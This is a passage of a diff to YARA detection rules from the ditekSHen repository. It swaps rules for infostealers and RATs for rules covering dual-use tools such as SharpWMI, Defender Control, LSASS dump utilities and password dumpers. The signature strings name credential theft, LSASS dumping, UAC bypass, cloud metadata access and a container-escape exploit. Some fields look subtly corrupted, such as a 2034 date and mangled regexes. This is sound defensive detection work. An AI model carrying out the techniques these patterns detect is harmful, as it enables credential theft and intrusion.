-		$p3 = "\\\\.\\pipe\\PipeDtMd" wide
-		$s1 = "graph.microsoft.com" fullword wide
-		$s2 = "CreateNamedPipe" ascii
-		$s3 = "\\CommonCommand\\" wide
-		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" wide
-		$ua2 = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136" wide
+		$s1 = "HideCurrUserOpt" fullword wide
+		$s2 = "/UAC:%X /NCRC%s" fullword wide
+		$s3 = "2MyRunAsStrings" fullword wide
+		$s4 = "CheckElevationEnabled" fullword ascii
+		$s5 = "UAC.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $p* ) and 1 of ( $s* ) ) or ( 1 of ( $ua* ) and 1 of ( $s* ) and 1 of ( $p* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Greetingghoul : FILE
+rule DITEKSHEN_INDICATOR_TOOL_REM_Intelliadmin : FILE
 {
 	meta:
-		description = "Detects GreetingGhoul Cryptocurrency Infostealer"
+		description = "Detects commerical IntelliAdmin remote tool"
 		author = "ditekSHen"
-		id = "42791b26-1cda-5bf3-b955-9de2dda1d63b"
+		id = "15385e0b-ead4-5614-a04e-55878eb70b34"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9662-L9679"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L589-L602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a2635066df031ba6e291c3ba14f9ed85bf3247c82c66eb1b3d3618fdebb47a6"
+		logic_hash = "8b601d68eff65bc6cc2fb46630a7021e229764f9a80f6d3278ba3b9f55e5b114"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "peer_list" fullword ascii
-		$s2 = "seed_hash" fullword ascii
-		$s3 = "pool_id" fullword ascii
-		$s4 = "%smutex=%s:%lu" ascii
-		$s5 = "miner.cfg" fullword ascii
-		$s6 = "{\"method\": \"%s\"%s}" ascii
-		$s7 = "/app/manager/%s" ascii
-		$s8 = "X-VNC-STATUS" fullword ascii
-		$s9 = "%s\\%lu.zip" fullword ascii
-		$s10 = "\\??\\%programdata%\\" wide
+		$pdb1 = "\\Network Administrator" ascii
+		$pdb2 = "\\Binaries\\Plugins\\Tools\\RPCService.pdb" ascii
+		$s1 = "CIntelliAdminRPC" fullword wide
+		$s2 = "IntelliAdmin RPC Service" fullword wide
+		$s3 = "IntelliAdmin Remote Execute v" ascii
+		$s4 = "IntelliAdminRPC" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or 2 of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Multi_Family_Infostealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpwmi : FILE
 {
 	meta:
-		description = "Detects Prynt, WorldWind, DarkEye, Stealerium and ToxicEye / TelegramRAT infostealers"
+		description = "Detects SharpWMI"
 		author = "ditekSHen"
-		id = "960830ba-df0d-539d-be2a-7778229f79bd"
+		id = "9c58d9fa-04b8-5a9c-8ae9-ff2e7530772f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9681-L9703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L604-L619"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0fdd1cdc4f2e5bee6c763e6e6b2e79d85285e44e2b5e3168a56d7d360252ee99"
+		logic_hash = "e6c5764d0883e2882e06f07e4729362011a4d65614259b85978e1c6ef5cfadb7"
 		score = 75
-		quality = 48
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$n1 = /Prynt|WorldWind|DarkEye(\s)?Stealer/ ascii wide
-		$n2 = "Stealerium" ascii wide
-		$x1 = "@FlatLineStealer" ascii wide
-		$x2 = "@CashOutGangTalk" ascii wide
-		$x3 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
-		$x4 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
-		$s1 = "Timeout /T 2 /Nobreak" fullword wide
-		$s2 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
-		$s3 = "Downloading file: \"{file}\"" wide
-		$s4 = "/bot{0}/getUpdates?offset={1}" wide
-		$s5 = "send command to bot!" wide
-		$s6 = " *Keylogger " fullword wide
-		$s7 = "*Stealer" wide
-		$s8 = "Bot connected" wide
-		$s9 = "### {0} ### ({1})" wide
+		$s1 = "scriptKillTimeout" fullword ascii
+		$s2 = "RemoteWMIExecuteWithOutput" fullword ascii
+		$s3 = "RemoteWMIFirewall" fullword ascii
+		$s4 = "iex([char[]](@({0})|%{{$_-bxor{1}}}) -join '')" fullword wide
+		$s5 = "\\\\{0}\\root\\subscription" fullword wide
+		$s6 = "_Context##RANDOM##" fullword wide
+		$s7 = "executevbs" fullword wide
+		$s8 = "scriptb64" fullword wide
 
 	condition:
 		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Darkeye : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Defendercontrol : FILE
 {
 	meta:
-		description = "Detects DarkEye infostealer"
+		description = "Detects Defender Control"
 		author = "ditekSHen"
-		id = "5296fe28-b54e-5d0f-aa2f-2050db585d82"
+		id = "7bc1f26e-2432-5642-b1e7-c87683f7d932"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9751-L9770"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L621-L631"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5496dcbfe075a4030a446027765186e9dd1931561a29a481139281e1708ce87d"
+		logic_hash = "826ed0643a07580750eb11c4cf2c2759f53b6c2bda51705476edc4808abccbf8"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$c1 = /Prynt(\s)?Stealer/ ascii wide
-		$c2 = /WorldWind(\s)?Stealer/ ascii wide
-		$c3 = "ToxicEye" ascii wide
-		$x2 = "@FlatLineStealer" ascii wide
-		$x3 = "@CashOutGangTalk" ascii wide
-		$s1 = "--- Clipper" wide
-		$s2 = "Downloading file: \"{file}\"" wide
-		$s3 = "/bot{0}/getUpdates?offset={1}" wide
-		$s4 = "send command to bot!" wide
-		$s5 = " *Keylogger " fullword wide
-		$s6 = "*Stealer" wide
-		$s7 = "Bot connected" wide
+		$s1 = "Windows Defender Control" wide
+		$s2 = "www.sordum.org" wide ascii
+		$s3 = "dControl" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and not any of ( $c* ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_MALWARE_Win_Invalidprinter : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Mulit_Venomagent : FILE
 {
 	meta:
-		description = "Invalid Printer (in2al5d p3in4er) Loader"
+		description = "Detects Venom Proxy Agent"
 		author = "ditekSHen"
-		id = "9b0a59e1-8105-5687-83b2-fb96229f59f9"
+		id = "598bc773-cbe9-503b-ba3e-27c2cde8910d"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9772-L9782"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L633-L645"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d14d53b2a73952244641f4e68a3dd5af8cb1e2bfc5936f300f9347b4881ceeb8"
+		logic_hash = "5eda23a237404a44dc9eb057adbf6106166374168eb08e55c182da5c05ecb4f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.InvalidPrinter"
 
 	strings:
-		$s1 = "in2al5d p3in4er" fullword ascii
-		$s2 = "CreateDXGIFactory" fullword ascii
+		$s1 = "github.com/Dliv3/Venom/" ascii
+		$s2 = "3HpKQVB3nT3qaNQPT-ZU/SKJ55ofz5TEmg5O3ROWA/CUs_-gfa04tGVO633Z4G/OSeEpRRb0Sq_5R6ArIi-" ascii
+		$s3 = "venom_agent -" ascii
+		$s4 = "bufferssh-userauthtransmitfileunknown portwirep: p->m= != sweepgen" ascii
+		$s5 = "golang.org/x/crypto/ssh.(*handshakeTransport).readPacket"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Raccoonv2 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_HFS_Webserver : FILE
 {
 	meta:
-		description = "Detects Raccoon Stealer 2.0, also referred to as RecordBreaker"
+		description = "Detects HFS Web Server"
 		author = "ditekSHen"
-		id = "2fc8313f-42f4-5b7e-8ae6-20455f736064"
+		id = "2c9d9a38-8a6c-5c53-84bc-4eef77933172"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9784-L9805"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L647-L658"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d47bb9051923147010452bcd6e7c370c2ff9ea9095bcb920b64f69873b15ec16"
+		logic_hash = "f5b8947e3858466dae5f476790842500f8184c4676d8c0c4870adb7fd3206652"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$f1 = "sgnl_" fullword ascii
-		$f2 = "tlgrm_" fullword ascii
-		$f3 = "ews_" fullword ascii
-		$f4 = "grbr_" fullword ascii
-		$f5 = "dscrd_" fullword ascii
-		$f6 = "wlts_" fullword ascii
-		$f7 = "scrnsht_" fullword ascii
-		$f8 = "sstmnfo_" fullword ascii
-		$s1 = "machineId=" fullword ascii
-		$s2 = "&configId=" fullword ascii
-		$s3 = "URL:%s" fullword ascii
-		$s4 = "USR:%s" fullword ascii
-		$s5 = "PASS:%s" fullword ascii
-		$s6 = "Content-Type: application/x-object" fullword ascii
+		$s1 = "SOFTWARE\\Borland\\Delphi\\" ascii
+		$s2 = "C:\\code\\mine\\hfs\\scriptLib.pas" fullword ascii
+		$s3 = "hfs.*;*.htm*;descript.ion;*.comment;*.md5;*.corrupted;*.lnk" ascii
+		$s4 = "Server: HFS" ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and ( 4 of ( $f* ) or all of ( $s* ) or 7 of them ) ) or 10 of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Truebot : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PROX_Lanproxy : FILE
 {
 	meta:
-		description = "Detects TrueBot"
+		description = "Detects lanproxy-go-client"
 		author = "ditekSHen"
-		id = "7210a0bd-d310-55bf-bb0c-14cadb59bd67"
+		id = "71fc23d9-9aae-5666-832b-90cf5a86c474"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9807-L9827"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L660-L675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a92141ef0aa7d68b3594a0f56c0370498fe5751a472c9011ac8b92ae46e88e53"
+		logic_hash = "13a5aaea0fb522e3badb4a60d2db8d7dd46e5721bd6dc2e2b2e29d49e197c375"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "%s\\rundll32.exe" fullword wide
-		$s2 = "ChkdskExs" fullword wide
-		$s3 = "n=%s&o=%s&a=%d&u=%s&p=%s&d=%s" ascii
-		$s4 = "KLLS" fullword ascii
-		$s5 = "%s\\%08x-%08x.ps1" fullword ascii
-		$s6 = ".JSONIP" ascii
-		$s7 = "CreateProcessAsUserW res %d err %d" fullword ascii
-		$s8 = "ldr_sys64.dll" fullword ascii
-		$s9 = "SVCHOST" fullword ascii
-		$s10 = "WINLOGON" fullword ascii
-		$s11 = { 67 6f 6f 67 6c 65 2e 63 6f 6d 00 00 00 00 00 00
-                2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00
-                20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
+		$s1 = "serverShare" fullword ascii
+		$s2 = "parkingOnChan" fullword ascii
+		$s3 = "{{join .Names \", \"}}{{\"\\t\"}}{{.Usage}}{{end}}{{end}}{{end}}{{end}}{{" ascii
+		$s4 = "</table></thead></tbody>" fullword ascii
+		$s5 = "value=aacute;abreve;addressagrave;alt -> andand;angmsd;angsph;any -> apacir;approx;articleatilde;barvee;barwed;bdoUxXvbecaus;ber" ascii
+		$s6 = "/dev/urandom127.0.0.1:" ascii
+		$s7 = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=reflect mismatchregexp: Compile(remote I/O error" ascii
+		$s8 = ".WithDeadline(.in-addr.arpa." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Lummastealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Peirates : FILE
 {
 	meta:
-		description = "Detects Lumma Stealer"
+		description = "Detects Kubernetes penetration tool Peirates"
 		author = "ditekSHen"
-		id = "b54521ab-4a31-5c1c-8ef2-b08b0f713693"
-		date = "2034-02-17"
-		date = "2034-02-17"
-		modified = "2024-11-01"
+		id = "74ce83ed-0d93-5cb0-97e8-6885ae83b336"
+		date = "2020-11-06"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9829-L9854"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L677-L694"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "74014c5bcc85977b90faed93b348c34e47ee033b06c2f145348ca9c54c27bda5"
+		logic_hash = "321f06af098283638f99d027dc3c95a25a72192a25c7afa5081a7dbff8c3acb7"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.LummaStealer"
 
 	strings:
-		$x1 = /Lum[0-9]{3}xedmaC2,\sBuild/ ascii
-		$x2 = /LID\(Lu[0-9]{3}xedmma\sID\):/ ascii
-		$s1 = /os_c[0-9]{3}xedrypt\.encry[0-9]{3}xedpted_key/ fullword ascii
-		$s2 = "c2sock" wide
-		$s3 = "c2conf" wide
-		$s4 = "TeslaBrowser/" wide
-		$s5 = "Software.txt" fullword wide
-		$s6 = "SysmonDrv" fullword
-		$s7 = "*.eml" fullword wide nocase
-		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
-		$s9 = "- Screen Resoluton:" ascii
-		$s10 = "lid=%s" ascii
-		$s11 = "&ver=" ascii
-		$s12 = "769cb9aa22f4ccc412f9cbc81feedd" fullword wide
-		$s13 = "gapi-node.io" fullword ascii
+		$s1 = "DeprecatedServiceAccount" fullword ascii
+		$s2 = "LivenessProbe" fullword ascii
+		$s3 = "\\t\\tkubectl expose rs nginx --port=80 --target-port=8000" ascii
+		$s4 = "\\t\\tkubectl run hazelcast --image=hazelcast --port=5701" ascii
+		$s5 = "COMPREPLY[$i]=${COMPREPLY[$i]#\"$colon_word\"}" ascii
+		$s6 = "%*polymorphichelpers.HistoryViewerFunc" ascii
+		$s7 = "ListenAndServeTLS" ascii
+		$s8 = "DownwardAPI" ascii
+		$s9 = "; plural=(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2);proto:" ascii
+		$s10 = "name: attack-" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or 5 of ( $s* ) or 7 of them )
+		uint16( 0 ) == 0x457f and 9 of them
 }
-rule DITEKSHEN_MALWARE_Win_Clipbanker03 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Botb : FILE
 {
 	meta:
-		description = "Detects ClipBanker"
+		description = "Detects Break out the Box (BOtB)"
 		author = "ditekSHen"
-		id = "57ba7d33-eba4-5bc1-9893-5441e439b900"
+		id = "acafa6dd-51b9-5945-b1df-7763a97a424f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9884-L9904"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L696-L710"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29bbb833c9aecc18b398b8c0d80649994f4992277d1aa2ee4ae8e319b59125d5"
+		logic_hash = "a01f796b27852f9217d9bfea32f8d9ffb3c88521d4413f6612f7a0544cf44fb3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "UNIC_KEY" fullword wide
-		$s2 = "[StartUp]" fullword wide
-		$s3 = "[Kill]" fullword wide
-		$s4 = "[antivm]" fullword wide
-		$s5 = "AntiVM" fullword ascii
-		$s6 = "AntiKill" fullword ascii
-		$s7 = "hWndRemove" fullword ascii
-		$s8 = "/Clip(watch|Chang|Mon)/" fullword ascii
-		$w1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
-		$w2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" fullword wide
-		$w3 = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" fullword wide
-		$w4 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" fullword wide
-		$w5 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s1 = "to unallocated span%%!%c(*big.Float=%s), RecursionDesired: /usr/share/zoneinfo//{Bucket}/{Key+}?acl/{Bucket}?accelerate/{Bucket}?encryption/{Bucket}?" ascii
+		$s2 = "exploit CVE-2019-5736 with command: [ERROR] In Enabling CGROUP Notifications -> 'echo 1 > [INFO] CGROUP may exist, attempting exploit regardless" ascii
+		$s3 = "main.execShellCmd" ascii
+		$s4 = "[*] Data uploaded to:[+]" ascii
+		$s5 = "whitespace or line breakfailed to find credentials in the environment.failed to get %s EC2 instance role credentialsfirst" ascii
+		$s6 = "This process will exit IF an EXECVE is called in the Container or if the Container is manually stoppedPerform reverse DNS lookups" ascii
+		$s7 = "http: request too largehttp://100.100.100.200/http://169.254.169.254/index out of range" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $w* ) or 6 of them )
+		uint16( 0 ) == 0x457f and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Dotrunpex : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_LSASS_Createminidump : FILE
 {
 	meta:
-		description = "Detects dotRunpeX injector"
+		description = "Detects CreateMiniDump tool"
 		author = "ditekSHen"
-		id = "4845edc1-110c-59a2-ace0-57a62b1e69e8"
+		id = "0d8642d1-2ed9-5270-a54a-6ba788026f5f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9906-L9918"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L712-L724"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7f802f233b2b4ff2c250bb8e96649f307bbb3457c78004751401b3ea7f531a0"
+		logic_hash = "577ccc783554363c0bed80d9642e8a0f107fc2ec66d84f76b9556aa3506c86c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" fullword wide
-		$s2 = "KoiVM" ascii
-		$s3 = "RunpeX.Stub.Framework" wide
-		$s4 = "ExceptionServices.ExceptionDispatchInfo" wide
-		$s5 = "Kernel32.Dll" wide
+		$s1 = "lsass.dmp" fullword wide
+		$s2 = "lsass dumped successfully!" ascii
+		$s3 = "Got lsass.exe PID:" ascii
+		$s4 = "\\experiments\\CreateMiniDump\\CreateMiniDump\\" ascii
+		$s5 = "MiniDumpWriteDump" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_MALWARE_Win_Cyberstealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Browserpassworddumper : FILE
 {
 	meta:
-		description = "Detects CyberStealer infostealer"
+		description = "Detects SecurityXploded Browser Password Dumper tool"
 		author = "ditekSHen"
-		id = "cb02013f-ffb2-5a17-9d6e-1d19b0e98fb8"
+		id = "ce90ef96-43c0-5d68-ba7d-21aafb3f754b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9920-L9941"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L726-L737"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "72413b68fa1381656202165dcd878761727e7caf0f15ccd65f3f2f842243a1f6"
+		logic_hash = "b3c6e9b393c244c7bf6489f54ebd622a09da050a65d6dbde325d5bcd7d85f39a"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "\\Cyber Stealer\\" ascii
-		$s1 = "[Virtualization]" fullword wide
-		$s2 = "\"encryptedPassword\":\"([^\"]+)\"" fullword wide
-		$s3 = "CreditCard" fullword ascii
-		$s4 = "DecryptPassword" fullword ascii
-		$s5 = "_modTime" fullword ascii
-		$s6 = "_pathname" fullword ascii
-		$s7 = "_pathnameInZip" fullword ascii
-		$s8 = "GetBookmarksDBPath" fullword ascii
-		$s9 = "GrabberImages" fullword ascii
-		$r1 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
-		$r2 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
-		$r3 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
-		$r4 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
+		$s1 = "\\projects\\windows\\BrowserPasswordDump\\Release\\FireMaster.pdb" ascii
+		$s2 = "%s: Dumping passwords" fullword ascii
+		$s3 = "%s - Found login data file...dumping the passwords from file %s" fullword ascii
+		$s4 = "%s Dumping secrets from login json file %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $r* ) ) ) or 7 of ( $s* ) or ( 5 of ( $s* ) and 2 of ( $r* ) ) or ( all of ( $r* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Arrowrat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Ftppassworddumper : FILE
 {
 	meta:
-		description = "Detects ArrowRAT"
+		description = "Detects SecurityXploded FTP Password Dumper tool"
 		author = "ditekSHen"
-		id = "14d3aabe-1ef5-599f-adbd-61b580099447"
+		id = "d876c201-b527-531c-9563-0b1a1c6334cb"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9943-L9961"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L739-L750"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "13e6d4fd274f75c50aa4110276812d02885c03cfc269dde480db66955e5f703a"
+		logic_hash = "941bfb9b1ce71252c5aa05bd654bdcf1af6cc1d5f720bc2c239e17454f15beda"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb" wide
-		$s2 = "Software\\Classes\\ms-settings\\shell\\open\\command" wide
-		$s3 = "DelegateExecute" fullword wide
-		$s4 = "powershell" wide
-		$s5 = "DESKTOP_HOOKCONTROL" fullword ascii
-		$s6 = "PROCESS_INFORMATION" fullword ascii
-		$s7 = "STARTUP_INFORMATION" fullword ascii
-		$s8 = /(Venom|Pandora)\shVNC/ fullword wide
-		$s9 = "cmd.exe /k START" fullword wide
-		$s10 = "ExclusionWD" fullword ascii
-		$s11 = "WinExec" fullword ascii
+		$s1 = "\\projects\\windows\\FTPPasswordDump\\Release\\FireMaster.pdb" ascii
+		$s2 = "//Dump all the FTP passwords to a file \"c:\\passlist.txt\"" ascii
+		$s3 = "//Dump all the FTP passwords to console" ascii
+		$s4 = "FTP Password Dump" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Ducktail : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Emailpassworddumper : FILE
 {
 	meta:
-		description = "Detects DuckTail"
+		description = "Detects SecurityXploded Email Password Dumper tool"
 		author = "ditekSHen"
-		id = "2d1a8f9e-ed5f-53fa-8ba8-b6d1344f6d39"
+		id = "25e140de-4a0a-5d4f-a93f-a414b9879f2b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9963-L9991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L752-L764"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a416212e5f87b33fdc14590c3d6d6ebc2915c2b383adf78d660c9408beb2323f"
+		logic_hash = "7f07611385d45bf45bfb8ee95e56febfb992fb7b416321c5b590878636a5c1b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "&global_scope_id=" wide
-		$s2 = "#ResolveMyIpAll" wide
-		$s3 = "#ApproveInvitesHandler" wide
-		$s4 = "#ProcessShareCok" wide
-		$s5 = "#InviteEmpHandler" wide
-		$s6 = "__activeScenarioIDs=%" wide
-		$s7 = "&__a=1&fb_dtsg=" wide
